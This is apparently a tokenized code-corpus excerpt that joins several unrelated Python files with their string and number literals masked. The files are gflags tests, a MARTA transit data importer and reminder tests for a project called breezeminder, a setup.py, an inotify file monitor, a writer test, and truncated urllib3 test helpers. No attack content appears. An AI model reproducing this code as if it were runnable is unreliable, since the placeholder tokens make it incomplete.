'<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:4> , <EOL> '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' ) <EOL> def testFloatErrorText ( self ) : <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = - <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , lower_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , upper_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> upper_bound = <NUM_LIT> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , lower_bound = - <NUM_LIT:1> , <EOL> upper_bound = <NUM_LIT:1> , flag_values = self . flag_values ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0.5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0.5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , <EOL> '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) <EOL> def _CheckErrorMessage ( self , flag_name , flag_value , expected_message_suffix ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . flag_values . __setattr__ ( flag_name , flag_value ) <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> except gflags . IllegalFlagValue , e : <EOL> expected = ( '<STR_LIT>' % <EOL> { '<STR_LIT:name>' : flag_name , '<STR_LIT:value>' : flag_value , <EOL> '<STR_LIT>' : expected_message_suffix } ) <EOL> self . assertEquals ( str ( e ) , expected ) <EOL> def main ( ) : <EOL> googletest . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import csv <EOL> import os <EOL> import sys <EOL> from dateutil . parser import parse as parse_date <EOL> from flask . ext . script import Command , Option <EOL> from breezeminder . models . marta import ( Route , <EOL> Schedule , <EOL> Shape , <EOL> Stop , <EOL> Trip , <EOL> ScheduledStop ) <EOL> class ImportMartaData ( Command ) : <EOL> """<STR_LIT>""" <EOL> FILES = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> PROCESSING_ORDER = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def get_options ( self ) : <EOL> return [ <EOL> Option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) , <EOL> Option ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> def run ( self , ** kwargs ) : <EOL> self . dirname = os . path . expanduser ( kwargs [ '<STR_LIT>' ] ) <EOL> if not os . path . exists ( self . dirname ) : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> print '<STR_LIT>' <EOL> self . do_clear ( ) <EOL> self . do_import ( ** kwargs ) <EOL> def do_clear ( self ) : <EOL> Trip . objects . delete ( ) <EOL> Stop . objects . delete ( ) <EOL> Shape . objects . delete ( ) <EOL> Schedule . objects . delete ( ) <EOL> Route . objects . delete ( ) <EOL> ScheduledStop . objects . delete ( ) <EOL> def do_import ( self , ** kwargs ) : <EOL> print '<STR_LIT>' <EOL> for filename in self . FILES : <EOL> fullname = os . path . join ( self . dirname , '<STR_LIT>' % filename ) <EOL> print fullname <EOL> if not os . path . exists ( fullname ) : <EOL> sys . exit ( '<STR_LIT>' % fullname ) <EOL> self . FILES [ filename ] = csv . DictReader ( open ( fullname , '<STR_LIT:r>' ) ) <EOL> print '<STR_LIT>' <EOL> for name in self . PROCESSING_ORDER : <EOL> print '<STR_LIT>' % name <EOL> getattr ( self , '<STR_LIT>' % name ) ( self . FILES [ name ] , ** kwargs ) <EOL> def allcaps ( self , string ) : <EOL> return '<STR_LIT:U+0020>' . join ( map ( lambda x : x . capitalize ( ) , string . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> def create_routes ( self , data , ** kwargs ) : <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> type = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> type = <NUM_LIT:0> <EOL> try : <EOL> Route ( id = id , <EOL> name = self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> description = self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> type = type , <EOL> color = row [ '<STR_LIT>' ] ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_calendar ( self , data , ** kwargs ) : <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> begin , end = None , None <EOL> if row [ '<STR_LIT>' ] : <EOL> begin = parse_date ( row [ '<STR_LIT>' ] ) <EOL> if row [ '<STR_LIT>' ] : <EOL> end = parse_date ( row [ '<STR_LIT>' ] ) <EOL> defaults = { <EOL> '<STR_LIT>' : begin , <EOL> '<STR_LIT:end>' : end <EOL> } <EOL> for dow in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> defaults [ dow ] = str ( row [ dow ] ) == '<STR_LIT:1>' <EOL> try : <EOL> Schedule ( id = id , ** defaults ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_shapes ( self , data , ** kwargs ) : <EOL> shapes = { } <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> if id not in shapes : <EOL> shapes [ id ] = [ ] <EOL> try : <EOL> lat = float ( row [ '<STR_LIT>' ] ) <EOL> lng = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> shapes [ id ] . append ( ( lat , lng ) ) <EOL> for id , points in shapes . iteritems ( ) : <EOL> try : <EOL> Shape ( id = id , points = points ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_stops ( self , data , ** kwargs ) : <EOL> self . stop_locations = { } <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> try : <EOL> lat = float ( row [ '<STR_LIT>' ] ) <EOL> lng = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> self . stop_locations [ id ] = ( lat , lng ) <EOL> defaults = { <EOL> '<STR_LIT:code>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT:description>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : ( lat , lng ) <EOL> } <EOL> try : <EOL> Stop ( id = id , ** defaults ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_stop_times ( self , data , ** kwargs ) : <EOL> count = <NUM_LIT:0> <EOL> for row in data : <EOL> if count % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % count <EOL> count += <NUM_LIT:1> <EOL> try : <EOL> trip_id = int ( row [ '<STR_LIT>' ] ) <EOL> stop_id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> route_id = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> schedule_id = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> direction = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> headsign = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> block = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> except ( AttributeError , KeyError ) : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> seq = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> seq = <NUM_LIT:0> <EOL> try : <EOL> dist = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> dist = <NUM_LIT:0.0> <EOL> parts = row [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> time = ( int ( parts [ <NUM_LIT:0> ] ) * <NUM_LIT> ) + ( int ( parts [ <NUM_LIT:1> ] ) * <NUM_LIT> ) + int ( parts [ <NUM_LIT:2> ] ) <EOL> try : <EOL> ScheduledStop ( route_id = route_id , <EOL> schedule_id = schedule_id , <EOL> trip_id = trip_id , <EOL> stop_id = stop_id , <EOL> arrival = time , <EOL> location = self . stop_locations [ stop_id ] , <EOL> shape_distance = dist , <EOL> pickup_type = row [ '<STR_LIT>' ] , <EOL> dropoff_type = row [ '<STR_LIT>' ] , <EOL> direction = direction , <EOL> headsign = headsign , <EOL> sequence = seq ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_trips ( self , data , ** kwargs ) : <EOL> self . trip_mapping = { } <EOL> count = <NUM_LIT:0> <EOL> for row in data : <EOL> if count % <NUM_LIT> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % count <EOL> count += <NUM_LIT:1> <EOL> try : <EOL> route_id = int ( row [ '<STR_LIT>' ] ) <EOL> svc_id = int ( row [ '<STR_LIT>' ] ) <EOL> trip_id = int ( row [ '<STR_LIT>' ] ) <EOL> shape_id = int ( row [ '<STR_LIT>' ] ) <EOL> self . trip_mapping [ trip_id ] = { <EOL> '<STR_LIT>' : route_id , <EOL> '<STR_LIT>' : svc_id , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> } <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> route = Route . objects . get ( id = route_id ) <EOL> except Route . DoesNotExist : <EOL> print '<STR_LIT>' % route_id <EOL> continue <EOL> try : <EOL> schedule = Schedule . objects . get ( id = svc_id ) <EOL> except Schedule . DoesNotExist : <EOL> print '<STR_LIT>' % svc_id <EOL> schedule = None <EOL> try : <EOL> shape = Shape . objects . get ( id = shape_id ) <EOL> except Shape . DoesNotExist : <EOL> print '<STR_LIT>' % shape_id <EOL> shape = None <EOL> defaults = { <EOL> '<STR_LIT>' : route , <EOL> '<STR_LIT>' : schedule , <EOL> '<STR_LIT>' : shape , <EOL> '<STR_LIT>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] <EOL> } <EOL> try : <EOL> Trip ( id = trip_id , ** defaults ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue </s>
<s> from copy import deepcopy <EOL> from datetime import datetime <EOL> from dateutil . relativedelta import relativedelta <EOL> from mock import Mock <EOL> from unittest2 import TestCase <EOL> from breezeminder . models . reminder import Reminder <EOL> from breezeminder . util . testing import silence_is_golden <EOL> class ReminderTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . bal_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT> ) <EOL> self . exp_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:2> , quantifier = '<STR_LIT>' ) <EOL> self . ride_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:5> ) <EOL> self . round_trip_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:3> ) <EOL> self . card = Mock ( ) <EOL> self . card . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT:2> ) <EOL> self . card . stored_value = <NUM_LIT:1> <EOL> self . card . products = [ ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> prod = Mock ( ) <EOL> prod . name = '<STR_LIT>' % i <EOL> prod . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = i ) <EOL> prod . remaining_rides = i <EOL> self . card . products . append ( prod ) <EOL> def test_description ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . bal_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . bal_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . ride_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . exp_rem . description ( html = False ) ) <EOL> @ silence_is_golden <EOL> def test_check_reminder_invalids ( self , * args ) : <EOL> self . bal_rem . valid_until = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT:2> ) <EOL> self . assertFalse ( self . bal_rem . check_reminder ( Mock ( ) ) ) <EOL> @ silence_is_golden <EOL> def test_check_balance_reminder ( self , * args ) : <EOL> self . card . stored_value = <NUM_LIT> <EOL> self . assertTrue ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card , last_state ) ) <EOL> self . card . stored_value = <NUM_LIT> <EOL> self . assertTrue ( self . bal_rem . _check_balance_reminder ( self . card , last_state ) ) <EOL> self . card . stored_value = <NUM_LIT> <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> self . card . stored_value = '<STR_LIT:foo>' <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> @ silence_is_golden <EOL> def test_check_expiration_reminder ( self , * args ) : <EOL> now = datetime . now ( ) <EOL> for quant in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . exp_rem . quantifier = quant <EOL> self . exp_rem . threshold = <NUM_LIT:1> <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) <EOL> self . assertTrue ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) - relativedelta ( days = <NUM_LIT:1> ) <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT> ) <EOL> for prod in self . card . products : <EOL> prod . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) <EOL> self . assertTrue ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> @ silence_is_golden <EOL> def test_check_round_trip_reminder ( self , * args ) : <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT:2> <EOL> self . assertTrue ( self . round_trip_rem . _check_round_trip_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . round_trip_rem . _check_round_trip_reminder ( self . card , last_state = last_state ) ) <EOL> self . card . products [ <NUM_LIT:0> ] . remaining_rides = <NUM_LIT:1> <EOL> self . assertTrue ( self . round_trip_rem . _check_round_trip_reminder ( self . card , last_state = last_state ) ) <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT> <EOL> self . assertFalse ( self . round_trip_rem . _check_round_trip_reminder ( self . card ) ) <EOL> @ silence_is_golden <EOL> def test_check_ride_reminder ( self , * args ) : <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT:3> <EOL> self . assertTrue ( self . ride_rem . _check_ride_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . ride_rem . _check_ride_reminder ( self . card , last_state = last_state ) ) <EOL> self . card . products [ <NUM_LIT:0> ] . remaining_rides = <NUM_LIT:2> <EOL> self . assertTrue ( self . ride_rem . _check_ride_reminder ( self . card , last_state = last_state ) ) <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT> <EOL> self . assertFalse ( self . ride_rem . _check_ride_reminder ( self . card ) ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) + open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) + open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> test_suite = "<STR_LIT>" , <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> zip_safe = False , <EOL> ) </s>
<s> import os , struct , threading , errno , select <EOL> from ctypes import CDLL , CFUNCTYPE , POINTER , c_int , c_char_p , c_uint32 , get_errno <EOL> from . common import FSEvent , FSMonitorOSError <EOL> module_loaded = True <EOL> libc = CDLL ( "<STR_LIT>" ) <EOL> strerror = CFUNCTYPE ( c_char_p , c_int ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_init = CFUNCTYPE ( c_int , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_add_watch = CFUNCTYPE ( c_int , c_int , c_char_p , c_uint32 , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_rm_watch = CFUNCTYPE ( c_int , c_int , c_int , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> IN_ACCESS = <NUM_LIT> <EOL> IN_MODIFY = <NUM_LIT> <EOL> IN_ATTRIB = <NUM_LIT> <EOL> IN_CLOSE_WRITE = <NUM_LIT> <EOL> IN_CLOSE_NOWRITE = <NUM_LIT> <EOL> IN_CLOSE = IN_CLOSE_WRITE | IN_CLOSE_NOWRITE <EOL> IN_OPEN = <NUM_LIT> <EOL> IN_MOVED_FROM = <NUM_LIT> <EOL> IN_MOVED_TO = <NUM_LIT> <EOL> IN_MOVE = IN_MOVED_FROM | IN_MOVED_TO <EOL> IN_CREATE = <NUM_LIT> <EOL> IN_DELETE = <NUM_LIT> <EOL> IN_DELETE_SELF = <NUM_LIT> <EOL> IN_MOVE_SELF = <NUM_LIT> <EOL> IN_UNMOUNT = <NUM_LIT> <EOL> IN_Q_OVERFLOW = <NUM_LIT> <EOL> IN_IGNORED = <NUM_LIT> <EOL> IN_ONLYDIR = <NUM_LIT> <EOL> IN_DONT_FOLLOW = <NUM_LIT> <EOL> IN_MASK_ADD = <NUM_LIT> <EOL> IN_ISDIR = <NUM_LIT> <EOL> IN_ONESHOT = <NUM_LIT> <EOL> action_map = { <EOL> IN_ACCESS : FSEvent . Access , <EOL> IN_MODIFY : FSEvent . Modify , <EOL> IN_ATTRIB : FSEvent . Attrib , <EOL> IN_MOVED_FROM : FSEvent . MoveFrom , <EOL> IN_MOVED_TO : FSEvent . MoveTo , <EOL> IN_CREATE : FSEvent . Create , <EOL> IN_DELETE : FSEvent . Delete , <EOL> IN_DELETE_SELF : FSEvent . DeleteSelf , <EOL> } <EOL> flags_map = { <EOL> FSEvent . Access : IN_ACCESS , <EOL> FSEvent . Modify : IN_MODIFY , <EOL> FSEvent . Attrib : IN_ATTRIB , <EOL> FSEvent . Create : IN_CREATE , <EOL> FSEvent . Delete : IN_DELETE , <EOL> FSEvent . DeleteSelf : IN_DELETE_SELF , <EOL> FSEvent . MoveFrom : IN_MOVED_FROM , <EOL> FSEvent . MoveTo : IN_MOVED_TO , <EOL> } <EOL> def convert_flags ( flags ) : <EOL> os_flags = <NUM_LIT:0> <EOL> flag = <NUM_LIT:1> <EOL> while flag < FSEvent . All + <NUM_LIT:1> : <EOL> if flags & flag : <EOL> os_flags |= flags_map [ flag ] <EOL> flag <<= <NUM_LIT:1> <EOL> return os_flags <EOL> def parse_events ( s ) : <EOL> i = <NUM_LIT:0> <EOL> while i + <NUM_LIT:16> < len ( s ) : <EOL> wd , mask , cookie , length = struct . unpack_from ( "<STR_LIT>" , s , i ) <EOL> name = s [ i + <NUM_LIT:16> : i + <NUM_LIT:16> + length ] . rstrip ( "<STR_LIT>" ) <EOL> i += <NUM_LIT:16> + length <EOL> yield wd , mask , cookie , name <EOL> class FSMonitorWatch ( object ) : <EOL> def __init__ ( self , wd , path , flags , user ) : <EOL> self . _wd = wd <EOL> self . path = path <EOL> self . flags = flags <EOL> self . user = user <EOL> self . enabled = True <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . path <EOL> class FSMonitor ( object ) : <EOL> def __init__ ( self ) : <EOL> fd = inotify_init ( ) <EOL> if fd == - <NUM_LIT:1> : <EOL> errno = get_errno ( ) <EOL> raise FSMonitorOSError ( errno , strerror ( errno ) ) <EOL> self . __fd = fd <EOL> self . __lock = threading . Lock ( ) <EOL> self . __wd_to_watch = { } <EOL> def __del__ ( self ) : <EOL> if module_loaded : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . __fd is not None : <EOL> os . close ( self . __fd ) <EOL> self . __fd = None <EOL> def _add_watch ( self , path , flags , user , inotify_flags = <NUM_LIT:0> ) : <EOL> inotify_flags |= convert_flags ( flags ) | IN_DELETE_SELF <EOL> wd = inotify_add_watch ( self . __fd , path , inotify_flags ) <EOL> if wd == - <NUM_LIT:1> : <EOL> errno = get_errno ( ) <EOL> raise FSMonitorOSError ( errno , strerror ( errno ) ) <EOL> watch = FSMonitorWatch ( wd , path , flags , user ) <EOL> with self . __lock : <EOL> self . __wd_to_watch [ wd ] = watch <EOL> return watch <EOL> def add_dir_watch ( self , path , flags = FSEvent . All , user = None ) : <EOL> return self . _add_watch ( path , flags , user , IN_ONLYDIR ) <EOL> def add_file_watch ( self , path , flags = FSEvent . All , user = None ) : <EOL> return self . _add_watch ( path , flags , user ) <EOL> def remove_watch ( self , watch ) : <EOL> return inotify_rm_watch ( self . __fd , watch . _wd ) != - <NUM_LIT:1> <EOL> def remove_all_watches ( self ) : <EOL> with self . __lock : <EOL> for wd in self . __wd_to_watch . iterkeys ( ) : <EOL> inotify_rm_watch ( self . __fd , wd ) <EOL> def enable_watch ( self , watch , enable = True ) : <EOL> watch . enabled = enable <EOL> def disable_watch ( self , watch ) : <EOL> watch . enabled = False <EOL> def read_events ( self , timeout = None ) : <EOL> if timeout is not None : <EOL> rs , ws , xs = select . select ( [ self . __fd ] , [ ] , [ ] , timeout ) <EOL> if self . __fd not in rs : <EOL> return [ ] <EOL> while True : <EOL> try : <EOL> s = os . read ( self . __fd , <NUM_LIT> ) <EOL> break <EOL> except OSError as e : <EOL> if e . errno != errno . EINTR : <EOL> raise FSMonitorOSError ( * e . args ) <EOL> events = [ ] <EOL> if not module_loaded : <EOL> return events <EOL> for wd , mask , cookie , name in parse_events ( s ) : <EOL> with self . __lock : <EOL> watch = self . __wd_to_watch . get ( wd ) <EOL> if watch is not None and watch . enabled : <EOL> bit = <NUM_LIT:1> <EOL> while bit < <NUM_LIT> : <EOL> if mask & bit : <EOL> action = action_map . get ( bit ) <EOL> if action is not None and ( action & watch . flags ) : <EOL> events . append ( FSEvent ( watch , action , name ) ) <EOL> bit <<= <NUM_LIT:1> <EOL> if mask & IN_IGNORED : <EOL> with self . __lock : <EOL> try : <EOL> del self . __wd_to_watch [ wd ] <EOL> except KeyError : <EOL> pass <EOL> return events <EOL> @ property <EOL> def watches ( self ) : <EOL> with self . __lock : <EOL> return self . __wd_to_watch . values ( ) </s>
<s> import sys <EOL> import unittest <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> from composer . index import Index <EOL> from composer . writer import FileWriter <EOL> class DummyFileWriter ( FileWriter ) : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> self . reset ( ) <EOL> super ( DummyFileWriter , self ) . __init__ ( * args , ** kw ) <EOL> def reset ( self ) : <EOL> self . _made_dirs = [ ] <EOL> self . _written_files = [ ] <EOL> def _prepare_dir ( self , path ) : <EOL> if path not in self . _made_dirs : <EOL> self . _made_dirs . append ( path ) <EOL> def _write_file ( self , path , content ) : <EOL> self . _written_files . append ( path ) <EOL> class TestWriter ( unittest . TestCase ) : <EOL> def test_file_materialize_path ( self ) : <EOL> w = DummyFileWriter ( Index ( ) ) <EOL> self . assertEqual ( w . _made_dirs , [ '<STR_LIT>' ] ) <EOL> test_values = [ <EOL> ( '<STR_LIT:/>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ] <EOL> for url , made_dirs , written_files in test_values : <EOL> w . reset ( ) <EOL> w . materialize_url ( url , '<STR_LIT>' ) <EOL> self . assertEqual ( w . _made_dirs , made_dirs ) <EOL> self . assertEqual ( w . _written_files , written_files ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import warnings <EOL> import sys <EOL> import errno <EOL> import functools <EOL> import logging <EOL> import socket <EOL> from nose . plugins . skip import SkipTest <EOL> from urllib3 . exceptions import MaxRetryError , HTTPWarning <EOL> from urllib3 . packages import six <EOL> TARPIT_HOST = '<STR_LIT>' <EOL> VALID_SOURCE_ADDRESSES = [ ( ( '<STR_LIT>' , <NUM_LIT:0> ) , True ) , ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) , False ) ] <EOL> INVALID_SOURCE_ADDRESSES = [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:0> ) ] <EOL> def clear_warnings ( cls = HTTPWarning ) : <EOL> new_filters = [ ] <EOL> for f in warnings . filters : <EOL> if issubclass ( f [ <NUM_LIT:2> ] , cls ) : <EOL> continue <EOL> new_filters . append ( f ) <EOL> warnings . filters [ : ] = new_filters <EOL> def setUp ( ) : <EOL> clear_warnings ( ) <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' , HTTPWarning ) <EOL> def onlyPy26OrOlder ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy27OrNewer ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format 